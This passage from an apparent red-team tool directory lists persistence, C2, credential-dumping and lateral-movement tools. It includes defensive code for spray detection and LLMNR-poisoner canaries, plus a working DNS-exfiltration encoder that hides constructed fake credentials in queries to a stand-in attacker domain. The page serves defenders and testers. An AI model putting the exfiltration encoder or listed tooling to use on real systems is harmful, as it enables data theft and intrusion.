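    for src, evs in by_source.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        counts: Counter = Counter()  # failures per account inside the window
        start = 0
        for e in evs:
            counts[e["TargetUserName"]] += 1
            # Expire events that fell out of the window.
            while e["TimeCreated"] - evs[start]["TimeCreated"] > window:
                old = evs[start]["TargetUserName"]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            heaviest = max(counts.values())
            if len(counts) >= spray_min_accounts and heaviest <= spray_max_per_account:
                result["password_spray"].add(src)
            if heaviest >= bruteforce_min_attempts:
                result["brute_force"].add(src)
    return result


if __name__ == "__main__":
    for label, sources in classify_sources(EVENTS).items():
        print(f"{label}: {sorted(sources) or '-'}")
```

The thresholds are the tuning knobs: a spray against a tenant with a 5-attempt lockout policy will sit at one or two failures per account, so the per-account ceiling matters more than the raw failure count, and a source that fails against many accounts with SubStatus 0xC0000064 is enumerating usernames rather than guessing passwords.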
STEP 5. Installation

Installation lets the adversary maintain persistence in the environment.

Persistence Tools

  • SharPersist Open Source: Windows persistence toolkit written in C#.
  • SharpStay Open Source: .NET project for installing Persistence.
  • SharpHide Open Source: Tool to create hidden registry keys.
  • ScheduleRunner Open Source: C# tool to customize scheduled task for persistence.
  • SharpEventPersist Open Source: Persistence by writing/reading shellcode from Event Log.
  • IIS-Raid Open Source: A native backdoor module for Microsoft IIS.
  • SharPyShell Open Source: Tiny and obfuscated ASP.NET webshell for C# web applications.
  • Kraken Open Source: Modular multi-language webshell.
  • HiddenDesktop Open Source: HVNC for Cobalt Strike.
  • DAMP Open Source: The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.
  • reGeorg Open Source: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies.
  • ABPTTS Open Source: TCP tunneling over HTTP for web application servers.
  • pivotnacci Open Source: A tool to make socks connections through HTTP agents.
STEP 6. Command & Control

Command & Control (C2) channels let the attacker issue instructions to the compromised devices.

Remote Access Tools (RAT) & C2 Frameworks

  • Cobalt Strike Commercial: Software for Adversary Simulations and Red Team Operations.
  • Villain Open Source: High level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells.
  • Kubesploit Open Source: Cross-platform post-exploitation HTTP/2 Command & Control server and agent focused on containerized environments.
  • Sliver Open Source: General purpose cross-platform implant framework.
  • Havoc Open Source: Modern and malleable post-exploitation command and control framework.
  • Empire Open Source: Post-exploitation framework that includes a pure-PowerShell Windows agent.
  • PoshC2 Open Source: Proxy aware C2 framework.
  • Covenant Open Source: .NET command and control framework.
  • Mythic Open Source: Cross-platform, post-exploit, red teaming framework.
  • Brute Ratel C4 Commercial: Advanced Red Team & Adversary Simulation Software.
  • merlin Open Source: Cross-platform post-exploitation C2 server and agent written in Go.
  • shad0w Open Source: Post exploitation framework designed to operate covertly.
  • Pupy Open Source: Cross-platform remote administration and post-exploitation tool.
  • NimPlant Open Source: Light first-stage C2 implant written in Nim and Python.
  • SharpC2 Open Source: C2 framework written in C#.
  • Nimhawk Open Source: Powerful, modular, lightweight and efficient command & control framework written in Nim.
  • AdaptixC2 Open Source: Extensible post-exploitation and adversarial emulation framework.
  • Loki Open Source: Node.js Command & Control for Script-Jacking Vulnerable Electron Applications.
  • SILENTTRINITY Open Source: Asynchronous, collaborative post-exploitation agent powered by Python and .NET.

Legitimate Remote Access Tools

  • ManageEngine Remote Access Plus Commercial: Comprehensive remote desktop tool offering advanced troubleshooting.
  • VNC Connect Commercial: Cross-platform remote access solution.
  • ISL Online Commercial: Cloud-based remote desktop solution.
  • Remote Desktop Manager Commercial: Centralizes remote connections and credentials.
  • Supremo Commercial: Lightweight, secure remote control software.
  • SolarWinds Dameware Remote Support Commercial: Robust remote support tool.
  • AnyDesk Commercial: Fast and lightweight remote desktop application.
  • Zoho Assist Commercial: Cloud-based remote support and remote access tool.
  • Citrix DaaS Commercial: Desktop-as-a-service solution offering secure remote access.
  • Microsoft Quick Assist Free: Simple Windows-based tool for remote assistance.
  • NinjaOne Commercial: IT management platform with remote access.
  • Atera Commercial: Remote monitoring and management (RMM) platform.

Staging & Redirectors

  • RedWarden Open Source: Flexible CobaltStrike Malleable Redirector.
  • AzureC2Relay Open Source: Azure Function that validates and relays Cobalt Strike beacon traffic.
  • C2concealer Open Source: Generates randomized C2 malleable profiles.
  • FindFrontableDomains Open Source: Search for potential frontable domains.
  • Domain Hunter Open Source: Checks expired domains for reputation.
  • pwndrop Open Source: Self-deployable file hosting service for red teamers.
  • C3 Open Source: Custom Command and Control tool.
  • Chameleon Open Source: Tool for evading Proxy categorisation.
  • redirect.rules Open Source: Dynamic redirect.rules generator.
  • SourcePoint Open Source: C2 profile generator for Cobalt Strike.
  • RedGuard Open Source: C2 front flow control tool.
  • skyhook Open Source: Round-trip obfuscated HTTP file transfer setup.
  • GraphStrike Open Source: Cobalt Strike HTTPS beaconing over Microsoft Graph API.
STEP 7. Actions on Objectives

Actions on Objectives is the final phase, in which intruders act to achieve their original goals, such as data exfiltration or lateral movement.

Exfiltration

  • SharpExfiltrate Open Source: Modular C# framework to exfiltrate loot over secure channels.
  • DNSExfiltrator Open Source: Data exfiltration over DNS request covert channel.
  • Egress-Assess Open Source: Tool used to test egress data detection capabilities.
  • VeilTransfer Open Source: Data exfiltration utility designed to test and enhance detection capabilities.
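DNSExfiltrator above illustrates the covert channel most egress filters cannot simply block: loot is encoded into the labels of DNS queries, and the attacker's authoritative server for that domain reassembles it. The code below is an added example for this page, not code from DNSExfiltrator or any other listed tool. It shows both sides of the channel (base32 chunks as labels under an assumed attacker domain, with a sequence label so the receiver can reorder) and a resolver-log detector that flags it from label length, label entropy and the number of unique names seen per parent domain. The domain, client addresses and loot bytes are all constructed.

```python
"""DNS covert channel, both sides: encode data into query names the way a DNS
exfiltration tool does, then flag it in resolver logs. Added example for this
resource page, not code from DNSExfiltrator or any listed tool; the domain,
client addresses and loot bytes are constructed.
"""
import base64
import math
from collections import Counter, defaultdict
from statistics import mean
from typing import Dict, Iterable, List, Tuple

MAX_LABEL = 63  # RFC 1035 label limit
MAX_NAME = 253  # practical limit for a presentation-format name


def encode_chunks(data: bytes, parent: str, labels_per_name: int = 2) -> List[str]:
    """Split `data` into names of the form <seq>.<b32>[.<b32>].<parent>."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    per_name = MAX_LABEL * labels_per_name
    names = []
    for seq, i in enumerate(range(0, len(b32), per_name)):
        chunk = b32[i:i + per_name]
        labels = [chunk[j:j + MAX_LABEL] for j in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([f"{seq:04x}"] + labels + [parent])
        if len(name) > MAX_NAME:
            raise ValueError("name too long; lower labels_per_name")
        names.append(name)
    return names


def decode_chunks(names: Iterable[str], parent: str) -> bytes:
    """Reassemble what the authoritative server for `parent` would receive."""
    suffix = "." + parent
    chunks = {}
    for name in names:
        if name.endswith(suffix):
            seq, *labels = name[:-len(suffix)].split(".")
            chunks[int(seq, 16)] = "".join(labels)
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def parent_of(qname: str, depth: int = 2) -> str:
    return ".".join(qname.rstrip(".").split(".")[-depth:])


def detect_dns_tunnels(queries: Iterable[Tuple[str, str]], min_unique: int = 5,
                       min_label_len: int = 30, min_entropy: float = 3.5) -> List[Dict]:
    """queries = (client_ip, qname) pairs from a resolver log. A (client, parent)
    pair is flagged when it has many unique names whose longest label is both
    long and high-entropy; all three must hold to keep CDN-style hostnames out."""
    stats = defaultdict(lambda: {"names": set(), "lens": [], "ents": []})
    for client, qname in queries:
        parent = parent_of(qname)
        if not qname.endswith("." + parent):
            continue  # bare second-level name, nothing to measure
        longest = max(qname[:-len(parent) - 1].split("."), key=len)
        s = stats[(client, parent)]
        s["names"].add(qname)
        s["lens"].append(len(longest))
        s["ents"].append(shannon_entropy(longest))
    alerts = []
    for (client, parent), s in stats.items():
        avg_len, avg_ent = mean(s["lens"]), mean(s["ents"])
        if len(s["names"]) >= min_unique and avg_len >= min_label_len and avg_ent >= min_entropy:
            alerts.append({"client": client, "parent": parent, "unique_names": len(s["names"]),
                           "avg_label_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2)})
    return alerts


# Constructed loot (fake account:hash lines) and an assumed attacker domain.
LOOT = b"\n".join(
    f"svc{i:02d}:{(0x9E3779B97F4A7C15 * (i + 1)) & (2**64 - 1):016x}"
    f"{(0x6A09E667F3BCC909 * (i + 7)) & (2**64 - 1):016x}".encode()
    for i in range(12)
)
TUNNEL_DOMAIN = "exfil.example.test"
QUERIES: List[Tuple[str, str]] = [
    ("10.0.0.5", "www.example.com"), ("10.0.0.5", "mail.example.com"),
    ("10.0.0.5", "autodiscover.example.com"), ("10.0.0.5", "cdn-static-eu-west-1.example.com"),
    ("10.0.0.5", "login.microsoftonline.com"),
] + [("10.0.0.23", name) for name in encode_chunks(LOOT, TUNNEL_DOMAIN)]


if __name__ == "__main__":
    assert decode_chunks((q for _, q in QUERIES), TUNNEL_DOMAIN) == LOOT
    for alert in detect_dns_tunnels(QUERIES):
        print(alert)
```

Two caveats a practitioner would add: tools that encode fewer bytes per query and pace them slowly defeat the length and volume heuristics, so the unique-names-per-parent count should be tracked over hours rather than minutes, and the detector needs the resolver's query log (or Zeek dns.log) rather than only the DNS server's answers, because the exfiltrated data lives in the question, not the response.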

Credential Dumping

  • NetExec (nxc) Free: The successor to CrackMapExec. The #1 tool for network pentesting (SMB/WinRM spraying, AD enumeration).
  • TruffleHog Free: The modern standard for finding secrets (API keys, creds) in code. Replaces gitGraber/Shhgit.
  • Hashcat Free: The industry standard for password cracking (GPU-based).
  • John the Ripper Free: Free and Open Source software, distributed primarily in a source code form.
  • Mimikatz Open Source: Allows users to view and save authentication credentials.
  • LaZagne Open Source: Retrieve lots of passwords stored on a local computer.
  • Dumpert Open Source: LSASS memory dumper using direct system calls and API unhooking.
  • CredBandit Open Source: BOF to perform a complete in memory dump of a process.
  • CloneVault Open Source: Export and import entries from Windows Credential Manager.
  • SharpLAPS Open Source: Retrieve LAPS password from LDAP.
  • SharpDPAPI Open Source: C# port of some DPAPI functionality from Mimikatz.
  • KeeThief Open Source: Extraction of KeePass 2.X key material from memory.
  • SafetyKatz Open Source: Combination of Mimikatz and .NET PE Loader.
  • forkatz Open Source: Credential dump using forshaw technique.
  • PPLKiller Open Source: Tool to bypass LSA Protection.
  • AndrewSpecial Open Source: Dumping lsass' memory stealthily.
  • Net-GPPPassword Open Source: .NET implementation of Get-GPPPassword.
  • SharpChromium Open Source: Retrieve Chromium data, such as cookies, history and saved logins.
  • Chlonium Open Source: Application designed for cloning Chromium Cookies.
  • SharpCloud Open Source: Simple C# utility for checking for the existence of credential files.
  • pypykatz Open Source: Mimikatz implementation in pure Python.
  • nanodump Open Source: A Beacon Object File that creates a minidump of the LSASS process.
  • Koh Open Source: C# and BOF toolset to capture user credential material.
  • PPLBlade Open Source: Protected Process Dumper Tool.
  • TrickDump Open Source: Dump lsass using only NTAPIS.
  • RemoteMonologue Open Source: Windows credential harvesting technique leveraging Interactive User RunAs key.
  • Cain and Abel Free: Wachtwoordhersteltool voor Windows.
  • RainbowCrack Free: Hash-kraker met behulp van rainbow tables.
  • THC Hydra Open Source: Geparallelliseerde netwerk login kraker.
  • L0phtCrack Open Source: Tool voor controle en herstel van wachtwoorden.

Lateral Movement

  • Ligolo-ng Open Source: Tunneling and pivoting tool that exposes reached networks through a userland TUN interface, replacing SOCKS/proxychains setups.
  • Responder Open Source: LLMNR, NBT-NS and mDNS poisoner with rogue authentication servers (SMB, HTTP, LDAP and more) to capture NetNTLM hashes.
  • Liquid Snake Open Source: Fileless lateral movement using WMI Event Subscriptions.
  • PowerUpSQL Open Source: PowerShell toolkit for discovering, auditing and attacking SQL Server.
  • SQLRecon Open Source: C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation.
  • SCShell Open Source: Fileless lateral movement tool that relies on ChangeServiceConfigA to run a command through an existing service.
  • SharpRDP Open Source: RDP console application for authenticated command execution without a GUI session.
  • MoveKit Open Source: Extension of Cobalt Strike's built-in lateral movement, wrapping SharpMove and SharpRDP in an aggressor script.
  • SharpNoPSExec Open Source: Fileless command execution for lateral movement by reconfiguring an existing service instead of creating one.
  • impacket Open Source: Python classes for SMB, MSRPC, Kerberos, LDAP and more, with example tools such as psexec.py, wmiexec.py and secretsdump.py.
  • Farmer Open Source: Collects NetNTLM hashes by planting files (e.g. .lnk, .searchConnector-ms) that make victims authenticate to a rogue WebDAV listener.
  • CIMplant Open Source: C# port of WMImplant; remote command execution and data gathering over WMI/CIM.
  • PowerLessShell Open Source: Relies on MSBuild.exe to remotely execute PowerShell scripts without launching powershell.exe.
  • SharpGPOAbuse Open Source: Abuses a user's edit rights on a Group Policy Object to push scheduled tasks, startup scripts or local admins to the targeted machines.
  • kerbrute Open Source: Quickly brute-forces and enumerates valid Active Directory accounts through Kerberos pre-authentication.
  • mssqlproxy Open Source: Toolkit for lateral movement through a compromised Microsoft SQL Server by turning it into a SOCKS proxy via socket reuse.
  • Invoke-TheHash Open Source: PowerShell pass-the-hash utilities for WMI and SMB command execution.
  • InveighZero Open Source: .NET IPv4/IPv6 machine-in-the-middle tool (LLMNR/mDNS/NBNS/DNS spoofing and NetNTLM capture).
  • SharpSpray Open Source: Password spraying against all users of a domain, taking the domain lockout policy into account.
  • CrackMapExec Open Source: Swiss army knife for pentesting Windows/AD networks; no longer maintained, superseded by NetExec.
  • SharpAllowedToAct Open Source: C# implementation of a computer object takeover through Resource-Based Constrained Delegation (RBCD).
  • SharpRDPHijack Open Source: Hijacks disconnected RDP sessions of other users without their password; requires SYSTEM privileges.
  • CheeseTools Open Source: Lateral movement and code execution tools (service, PowerShell remoting, DCOM, RDP) based on MiscTools.
  • LatLoader Open Source: Automated lateral movement with Havoc C2.
  • MalSCCM Open Source: Abuses local or remote SCCM servers to deploy applications to managed hosts.
  • Coercer Open Source: Coerces a Windows server to authenticate to an arbitrary machine through many RPC methods (MS-RPRN, MS-EFSR, MS-FSRVP and others).
  • orpheus Open Source: Modified Kerberoasting that requests service tickets in a way that evades common Kerberoast detections.
  • goexec Open Source: Go toolkit for remote execution on Windows hosts via SCM, WMI, DCOM and scheduled tasks.
  • BitlockMove Open Source: Lateral movement via BitLocker DCOM interfaces and COM hijacking.
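
Several tools in this list (Responder, InveighZero, Farmer) rely on answering LLMNR name lookups that no legitimate host would answer. That gives defenders a cheap canary: query the LLMNR multicast group for a hostname that does not exist and treat any reply as a poisoner. The code below is an added example for this page (not code from Responder or any listed tool). It uses the LLMNR defaults from RFC 4795 (multicast 224.0.0.252, UDP 5355, DNS-style message layout); the canary name is random, and the response bytes used for the offline check are constructed by `build_response()`, which models what a poisoner sends back.

```python
"""LLMNR poisoning canary (detects Responder/InveighZero-style poisoners on the local segment).

Added example for this page, not code from any listed tool. Uses the LLMNR defaults
from RFC 4795 (multicast 224.0.0.252, UDP 5355, DNS-style message format). The
response bytes used for the offline check are constructed by build_response().
"""
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1


def build_query(name: str, txid: int, qtype: int = QTYPE_A) -> bytes:
    """LLMNR query: DNS-style header (QDCOUNT=1, no flags) followed by one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, QCLASS_IN)


def read_name(data: bytes, offset: int):
    """Decode a label sequence at `offset`, following compression pointers.
    Returns (dotted_name, offset just past the name in the original byte stream)."""
    labels, end, hops = [], None, 0
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                       # 2-byte pointer into the message
            hops += 1
            if hops > 8:
                raise IndexError("pointer loop")         # refuse hostile pointer cycles
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            if end is None:
                end = offset + 2
            offset = pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels), end if end is not None else offset


def parse_response(data: bytes, expected_txid: int, expected_name: str):
    """Return [(name, ipv4), ...] for A-record answers matching our canary name, else []."""
    try:
        txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
        if txid != expected_txid or not flags & 0x8000:  # wrong transaction, or not a response
            return []
        offset = 12
        for _ in range(qd):                               # skip the echoed question(s)
            _, offset = read_name(data, offset)
            offset += 4                                   # QTYPE + QCLASS
        answers = []
        for _ in range(an):
            name, offset = read_name(data, offset)
            rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
            offset += 10
            rdata = data[offset:offset + rdlen]
            offset += rdlen
            if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
                answers.append((name, socket.inet_ntoa(rdata)))
    except (struct.error, IndexError):
        return []                                         # truncated or malformed packet
    return [a for a in answers if a[0].lower() == expected_name.lower()]


def build_response(query: bytes, ipv4: str, ttl: int = 30, compress: bool = False) -> bytes:
    """Construct the answer a poisoner returns for `query` (used to test the parser offline).
    With compress=True the owner name is a pointer to the question name, as in DNS."""
    txid = struct.unpack("!H", query[:2])[0]
    _, end = read_name(query, 12)
    question = query[12:end + 4]                          # QNAME + QTYPE + QCLASS
    owner = b"\xc0\x0c" if compress else query[12:end]
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)   # QR=1, one question, one answer
    return header + question + owner + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(ipv4)


def probe(name=None, timeout: float = 2.0):
    """Send one canary query to the LLMNR group; return [(name, ip, sender), ...].
    On a healthy segment the list is empty (the name does not exist); any entry is a poisoner."""
    name = name or "canary-%06x" % random.randrange(1 << 24)
    txid = random.randrange(1 << 16)
    answers = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)   # link-local only
        s.settimeout(timeout)
        s.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:
                data, (src, _) = s.recvfrom(4096)
                answers += [(n, ip, src) for n, ip in parse_response(data, txid, name)]
        except socket.timeout:
            pass
    return answers


if __name__ == "__main__":
    for canary, ip, src in probe():
        print(f"LLMNR poisoner suspected: {src} answered {canary} with {ip}")
```

Run it from a host on each segment you care about (LLMNR is link-local multicast, so a poisoner on another VLAN is invisible to it), and repeat with a fresh random name each time so a poisoner cannot simply ignore one known canary. The check covers LLMNR only; NBT-NS (UDP 137) and mDNS (UDP 5353) need their own probes, and the durable fix is to disable LLMNR via Group Policy and enforce SMB signing so captured NetNTLM hashes cannot be relayed.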

Tunneling

  • Chisel Open Source: Fast TCP/UDP tunnel transported over HTTP and secured via SSH; a single binary serves as client and server.
  • frp Open Source: Fast reverse proxy that exposes a local service behind NAT or a firewall to the internet.
  • SockTail Open Source: Joins a device to a Tailscale network and exposes a local SOCKS5 proxy over it.

Network & Analysis

  • Wireshark Open Source: Network protocol analyzer with deep packet inspection and stream reassembly.
  • Ettercap Open Source: Tool for LAN machine-in-the-middle attacks (ARP poisoning, sniffing, content filtering).
  • Bettercap Open Source: The "Swiss Army knife" for network attacks and monitoring (Ethernet, Wi-Fi, BLE, MITM).
  • FoxyProxy Free: Browser extension for switching quickly between proxy configurations, e.g. to route traffic through an intercepting proxy.
  • CyberChef Open Source: The Cyber Swiss Army Knife: a web app for encryption, encoding, compression and data analysis.
  • tcpdump Open Source: Command-line network packet analyzer.
  • Snort Open Source: Network intrusion detection and prevention system.
  • Ngrep Open Source: Network packet analyzer using grep-like patterns.
  • NetworkMiner Open Source: Network forensic analysis tool that carves files, credentials and sessions from pcaps.
  • Hping3 Open Source: Command-line packet crafting and analysis tool.
  • Nemesis Open Source: Packet crafting and injection tool.